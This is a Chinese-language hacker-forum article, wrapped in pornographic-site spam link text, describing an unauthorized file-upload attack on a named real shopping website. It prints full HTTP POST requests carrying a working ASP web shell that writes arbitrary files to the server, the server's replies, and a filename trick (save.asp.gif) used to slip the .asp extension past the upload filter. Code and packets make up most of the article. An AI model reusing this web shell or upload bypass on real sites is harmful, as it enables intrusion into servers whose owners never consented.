国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關注微信公眾號

一次小小的上傳文件測試
2009-01-03   

下午5:52分,快吃晚飯了,這段時間里我比較喜歡給忙碌了一天的自己放短假,所以按照習慣就跑去幾個常去的黑客站點看看文章,武漢的315安全網我還是比較喜歡的,東西比較多而且更新的也還算及時。
記得看過一次315安全網里的一位兄臺做過一個他們服務器硬盤權限分配的動畫,了解到是一臺虛擬主機,用自己寫的程序跑了跑,看看有沒有什么可以利用的地方,發現了一個動感購物商城的上傳頁面,呵呵……
http://www.whdlwj.com/upload_flash.asp?formname=myform&editname=bookpic&uppath=bookpic&filelx=jpg
就抓了個包試試看上傳,包的結果如下:

POST /upfile_flash.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel,   application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.whdlwj.com/upload_flash.asp?formname=myform&editname=bookpic&uppath=bookpic&filelx=jpg
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d51863950254
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 1.1.4322)
Host: www.whdlwj.com
Content-Length: 3306
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDCARBBDSS=NDPLMAIBCAFLEEMECJONPJJJ

-----------------------------7d51863950254
Content-Disposition: form-data; name="filepath"

bookpic/
-----------------------------7d51863950254
Content-Disposition: form-data; name="filelx"

jpg
-----------------------------7d51863950254
Content-Disposition: form-data; name="EditName"

bookpic
-----------------------------7d51863950254
Content-Disposition: form-data; name="FormName"

myform
-----------------------------7d51863950254
Content-Disposition: form-data; name="act"

uploadfile
-----------------------------7d51863950254
Content-Disposition: form-data; name="file1"; filename="G:\backdoor\網頁木馬\海陽ASP木馬\2005\改好的\save.asp"
Content-Type: application/octet-stream

<style type="text/css">
<!--
.unnamed1 {
font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 12px;
font-style: normal;
line-height: normal;
color: #000000;
text-decoration: none;
}
.style6 {color: #FF0033}
.style7 {color: #000000; }
.style8 {color: #0000FF}
-->
</style>
<div align="center">
<table width="372" border="1" align="center" class="unnamed1">
<tr>
<td align="center" valign="middle"><div align="center">
<p>
<% dim objFSO %>
<% dim fdata %>
<% dim objCountFile %>
<% on error resume next %>
<% Set objFSO = Server.CreateObject("Scripting.FileSystemObject") %>
<% if Trim(request("syfdpath"))"" then %>
<% fdata = request("cyfddata") %>
<% Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True) %>
<% objCountFile.Write fdata %>
<% if err =0 then %>
<% response.write "<font color=red>Save Success!</font>" %>
<% else %>
<% response.write "<font color=red>Save UnSuccess!</font>" %>
<% end if %>
<% err.clear %>
<% end if %>
<% objCountFile.Close %>
<% Set objCountFile=Nothing %>
<% Set objFSO = Nothing %>
<% Response.write "<form action='' method=post>" %>
<% Response.write "保存文件的<font color=red>絕對路徑(包括文件名:如D:\web\sys.asp):</font>" %>
</p>
<p>
<% Response.Write "<input type=text name=syfdpath width=32 size=50>" %>
<% Response.Write "<br>" %>
</p>
<p>             
<% Response.write "本文件<font color=red>絕對路徑:</font>" %>
<% =server.mappath(Request.ServerVariables("SCRIPT_NAME")) %>
</p>
<p>           
<% Response.write "<br>" %>
<% Response.write "輸入馬的內容:" %>
</p>
<p>
<% Response.write "<textarea name=cyfddata cols=80 rows=10 width=32></textarea>" %>
</p>
<p>
<% Response.write "<input type=submit value=Save>" %>
<% Response.write "</form>" %>
</p>
<p class="style7">Save File Workstation Beautify the version</p>
<p class="style6">  <span class="style8">----Power By Perl</span> </p>
</div></td>
</tr>
</table>
</div>
-----------------------------7d51863950254
Content-Disposition: form-data; name="Submit"

開始上傳
-----------------------------7d51863950254--

按照正常的手段改數據包先進行測試,提交結果返回為:
HTTP/1.1 500 Internal Server Error
Date: Mon, 18 Apr 2005 10:05:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 493
Content-Type: text/html
Cache-control: private

<!--
┌─ o91.com───────────────┐
│  動感購物商務平臺WWW.SNSN.NET版權所有  │
│  設計:模糊視線13855119911 QQ:9912515 │
└────────────────────┘
-->

<link href="css.css" rel="stylesheet" type="text/css">
<font face="宋體" size=2>
<p>ADODB.Stream</font> <font face="宋體" size=2>錯誤 '800a0bbc'</font>
<p>
<font face="宋體" size=2>寫入文件失敗。</font>
<p>
<font face="宋體" size=2>/upload_wj.inc</font><font face="宋體" size=2>,行 181<
/font>

從返回數據得知根目錄限制了文件寫入,那我們就換一個目錄,將包里的上傳路徑改為bookpic/sys.asp,字節改為3314,提示如下:
HTTP/1.1 200 OK
Date: Mon, 18 Apr 2005 10:07:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 472
Content-Type: text/html
Cache-control: private

<!--
┌─ o91.com───────────────┐
│  動感購物商務平臺WWW.SNSN.NET版權所有  │
│  設計:模糊視線13855119911 QQ:9912515 │
└────────────────────┘
-->

<link href="css.css" rel="stylesheet" type="text/css">
<script>window.opener.document.myform.bookpic.value='bookpic/sys.asp200541818754
95496.gif'</script>
<script language="javascript">
window.alert("文件上傳成功!請不要修改生成的鏈接地址!");
window.close();
</script>

嘿嘿,文件上傳成功,不過你別急,看清楚包的返回數據為bookpic/sys.asp20054181875495496.gif,打開這個文件來就是我們的后門文件代碼了。都到這個地方了,傳不上去有點不甘心,認真看看文件名bookpic/sys.asp20054181875495496.gif,怎么樣?有點想法沒有?呵呵……
我們的文件后綴.asp它還保留著呢,只不過在后面給我們加上了一段長長的字符串和gif后綴,讓我們的asp文件變成了gif文件。因為我沒有看過這套程序的上傳文件代碼,所以我就靠經驗來改改這個后門的數據包,讓它截斷后面的部分。改動之后的數據包如下:
POST /upfile_flash.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.whdlwj.com/upload_flash.asp?formname=myform&editname=bookpic&uppath=bookpic&filelx=jpg
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d51863950254
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 1.1.4322)
Host: www.whdlwj.com
Content-Length: 3316
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDCARBBDSS=NDPLMAIBCAFLEEMECJONPJJJ

-----------------------------7d51863950254
Content-Disposition: form-data; name="filepath"

bookpic/wolf.asp
-----------------------------7d51863950254
Content-Disposition: form-data; name="filelx"

jpg
-----------------------------7d51863950254
Content-Disposition: form-data; name="EditName"

bookpic
-----------------------------7d51863950254
Content-Disposition: form-data; name="FormName"

myform
-----------------------------7d51863950254
Content-Disposition: form-data; name="act"

uploadfile
-----------------------------7d51863950254
Content-Disposition: form-data; name="file1"; filename="G:\backdoor\網頁木馬\海陽ASP木馬\2005\改好的\save.asp.gif"
Content-Type: application/octet-stream

<style type="text/css">
<!--
.unnamed1 {
font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 12px;
font-style: normal;
line-height: normal;
color: #000000;
text-decoration: none;
}
.style6 {color: #FF0033}
.style7 {color: #000000; }
.style8 {color: #0000FF}
-->
</style>
<div align="center">
<table width="372" border="1" align="center" class="unnamed1">
<tr>
<td align="center" valign="middle"><div align="center">
<p>
<% dim objFSO %>
<% dim fdata %>
<% dim objCountFile %>
<% on error resume next %>
<% Set objFSO = Server.CreateObject("Scripting.FileSystemObject") %>
<% if Trim(request("syfdpath"))"" then %>
<% fdata = request("cyfddata") %>
<% Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True) %>
<% objCountFile.Write fdata %>
<% if err =0 then %>
<% response.write "<font color=red>Save Success!</font>" %>
<% else %>
<% response.write "<font color=red>Save UnSuccess!</font>" %>
<% end if %>
<% err.clear %>
<% end if %>
<% objCountFile.Close %>
<% Set objCountFile=Nothing %>
<% Set objFSO = Nothing %>
<% Response.write "<form action='' method=post>" %>
<% Response.write "保存文件的<font color=red>絕對路徑(包括文件名:如D:\web\sys.asp):</font>" %>
</p>
<p>
<% Response.Write "<input type=text name=syfdpath width=32 size=50>" %>
<% Response.Write "<br>" %>
</p>
<p>             
<% Response.write "本文件<font color=red>絕對路徑:</font>" %>
<% =server.mappath(Request.ServerVariables("SCRIPT_NAME")) %>
</p>
<p>           
<% Response.write "<br>" %>
<% Response.write "輸入馬的內容:" %>
</p>
<p>
<% Response.write "<textarea name=cyfddata cols=80 rows=10 width=32></textarea>" %>
</p>
<p>
<% Response.write "<input type=submit value=Save>" %>
<% Response.write "</form>" %>
</p>
<p class="style7">Save File Workstation Beautify the version</p>
<p class="style6">  <span class="style8">----Power By Perl</span> </p>
</div></td>
</tr>
</table>
</div>
-----------------------------7d51863950254
Content-Disposition: form-data; name="Submit"

開始上傳
-----------------------------7d51863950254--

整個包的大體并沒變化,只需要將第一次修改的數據包里的G:\backdoor\網頁木馬\海陽ASP木馬\2005\改好的\save.gif改為G:\backdoor\網頁木馬\海陽ASP木馬\2005\改好的\save.asp.gif,其余不變,再傳一次。上傳的窗口一閃就關閉了(因為我是用了個BAT來執行提交的),嘿嘿……雖然看不到返回結果,不過我知道這個時候數據已經被我截斷了,文件也正常的變成了asp。再進后門看看,瀏覽器顯示:

該頁無法顯示
您試圖從目錄中執行 CGI、ISAPI 或其他可執行程序,但該目錄不允許執行程序。
--------------------------------------------------------------------------------

請嘗試以下操作:

如果您認為該目錄應該允許執行訪問權限,請與網站管理員聯系。
HTTP 錯誤 403.1 - 禁止訪問:執行訪問被拒絕。
Internet 信息服務 (IIS)

嘿嘿……有這個顯示就說明OK了,可以上傳ASP文件了,之后又換了換目錄試試,都不允許寫入文件^_^!。這個圖片目錄也不允許執行我們的后門。
畢竟是安全站點的主機,在目錄限制和權限設置這方面做的還可以,要不一會就被人黑了可就羞大了^_^。到這里,我做的整個測試就結束了,不知道看完了大家有什么感想,雖然并沒有拿到SHELL,其實我想突出講的一點是文章中的思路,以及平時需要的是多積累經驗,在應用的再多留心一點,那發現一點點小東西并不是特別的困難^_^。(文章看的不爽的別拿雞蛋丟,我吃的怕了,拿錢咂我好了,我窮啊~~~)。


熱詞搜索:

上一篇:提權,以MySQL之名
下一篇:trim()的漏洞破解與防護+文章始末

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
欧美电影在线免费观看| 亚洲天堂av一区| 国产网红主播福利一区二区| 精品制服美女丁香| 精品国产精品网麻豆系列| 美女视频黄a大片欧美| 精品成人私密视频| 大白屁股一区二区视频| 一区二区三区在线播| 欧美日韩一区二区在线视频| 青椒成人免费视频| 国产婷婷精品av在线| 国产91精品露脸国语对白| 国产精品国产三级国产专播品爱网 | 国产三级久久久| 欧美午夜免费电影| 国产一本一道久久香蕉| 亚洲另类色综合网站| 日韩欧美激情在线| 日本韩国一区二区三区| 国产精品一区二区在线播放| 一区二区三国产精华液| 26uuu国产电影一区二区| 欧美写真视频网站| 成人精品亚洲人成在线| 蜜桃一区二区三区在线观看| **性色生活片久久毛片| 精品国产欧美一区二区| 欧美日韩电影在线播放| 97成人超碰视| 国产成人av电影在线播放| 日一区二区三区| 亚洲精品成人少妇| 国产精品素人一区二区| 日韩欧美国产一区二区三区 | 国产精品亚洲视频| 日本中文字幕一区| 亚洲女爱视频在线| 中文字幕一区二区三区在线播放| 欧美一二三区在线观看| 91搞黄在线观看| 成熟亚洲日本毛茸茸凸凹| 精品在线观看视频| 蜜桃一区二区三区在线观看| 午夜精品福利久久久| 一区二区三区中文在线观看| 亚洲欧美自拍偷拍色图| 国产精品美女久久久久aⅴ国产馆 国产精品美女久久久久av爽李琼 国产精品美女久久久久高潮 | 国产亚洲一区二区在线观看| 欧美一区二区三区在| 51久久夜色精品国产麻豆| 欧美日韩黄视频| 欧美午夜电影网| 欧美性猛交xxxxxx富婆| 欧美日韩精品一区二区三区四区 | 91精品国产综合久久久久久漫画| 在线免费亚洲电影| 欧美系列日韩一区| 91精品国产色综合久久久蜜香臀| 欧美日韩免费在线视频| 欧美日韩国产成人在线91| 欧美一区二区视频免费观看| 日韩视频免费观看高清完整版在线观看| 欧美男生操女生| 精品欧美一区二区三区精品久久 | 91精品欧美久久久久久动漫 | 国产ts人妖一区二区| 国产成人在线观看| eeuss鲁片一区二区三区在线看| 99在线视频精品| 欧美性极品少妇| 欧美一区二区福利视频| 久久久综合精品| 亚洲精品五月天| 亚洲成av人片一区二区| 精品一二三四区| youjizz国产精品| 欧美二区在线观看| 国产日韩av一区二区| 亚洲综合偷拍欧美一区色| 免费观看日韩电影| 成人app网站| 91精品国产色综合久久久蜜香臀| 欧美精品一区视频| 亚洲欧美另类久久久精品| 视频一区中文字幕国产| 成人国产在线观看| 69堂成人精品免费视频| 中文一区二区完整视频在线观看| 亚洲一卡二卡三卡四卡无卡久久| 麻豆一区二区三| 日本久久电影网| 久久久国际精品| 亚洲成人动漫在线免费观看| 国产成人在线网站| 欧美大胆人体bbbb| 亚洲黄色小说网站| 国产·精品毛片| 宅男在线国产精品| 日韩毛片高清在线播放| 精品中文av资源站在线观看| 91传媒视频在线播放| 中文字幕av一区二区三区高| 美女看a上一区| 色综合久久88色综合天天免费| 久久久久久亚洲综合影院红桃| 亚洲福利国产精品| 在线一区二区观看| 亚洲精品中文在线观看| 成人福利视频网站| 欧美韩日一区二区三区| 九色综合国产一区二区三区| 5月丁香婷婷综合| 亚洲高清在线精品| 色偷偷88欧美精品久久久| 国产欧美一区二区三区在线老狼| 麻豆专区一区二区三区四区五区| 在线观看日韩av先锋影音电影院| 亚洲国产精品成人综合| 国产在线视频一区二区三区| 欧美日本国产一区| 亚洲成精国产精品女| 欧美在线你懂的| 一卡二卡欧美日韩| 色呦呦国产精品| 亚洲色图制服丝袜| 色综合天天综合狠狠| 日韩主播视频在线| 波多野结衣视频一区| 国产精品黄色在线观看| eeuss鲁片一区二区三区在线看| 国产日韩亚洲欧美综合| 国产麻豆日韩欧美久久| 久久久国产精品不卡| 国产成人免费高清| 国产精品福利一区| 欧亚洲嫩模精品一区三区| 亚洲综合免费观看高清完整版在线| 色欧美日韩亚洲| 天天操天天综合网| 欧美一个色资源| 粉嫩av一区二区三区| 国产精品久久久久国产精品日日| www.亚洲色图| 亚洲国产婷婷综合在线精品| 日韩一级在线观看| 国产精品一区二区黑丝 | 精品福利一区二区三区| 国产精品一区一区| 亚洲欧美日韩小说| 日韩一区二区三区免费看 | 亚洲欧洲日韩av| 欧美日本免费一区二区三区| 激情五月播播久久久精品| 一色桃子久久精品亚洲| 欧美区一区二区三区| 国产999精品久久久久久绿帽| 亚洲天堂福利av| 欧美一区二区三区四区视频| 国产精品一二二区| 亚洲精品乱码久久久久| 精品久久免费看| 日本福利一区二区| 国产精品一区二区三区四区 | 一本大道综合伊人精品热热| 日韩电影在线观看一区| 国产精品无遮挡| 91精品国产一区二区三区蜜臀| 成人黄动漫网站免费app| 蜜臀久久99精品久久久久宅男| 亚洲国产精品成人综合| 日韩欧美综合一区| 色综合色狠狠天天综合色| 久久精品国产第一区二区三区| 国产精品久久久久久妇女6080| 日韩视频永久免费| 欧美日韩高清一区二区不卡| 不卡的av网站| 久久成人免费电影| 亚洲sss视频在线视频| 亚洲欧美综合色| 欧美激情一区二区在线| 日韩欧美一二区| 欧美日韩你懂得| 欧美在线|欧美| 91在线国内视频| www.性欧美| 国产v综合v亚洲欧| 国产福利91精品一区二区三区| 天天色图综合网| 亚洲成人动漫精品| 一区二区三区四区在线播放| 国产精品毛片a∨一区二区三区 | 日韩一区二区精品在线观看| 色呦呦国产精品| 96av麻豆蜜桃一区二区| 不卡电影免费在线播放一区| 国产成人综合网站| 国产成人av电影| 成人性生交大片免费看视频在线 |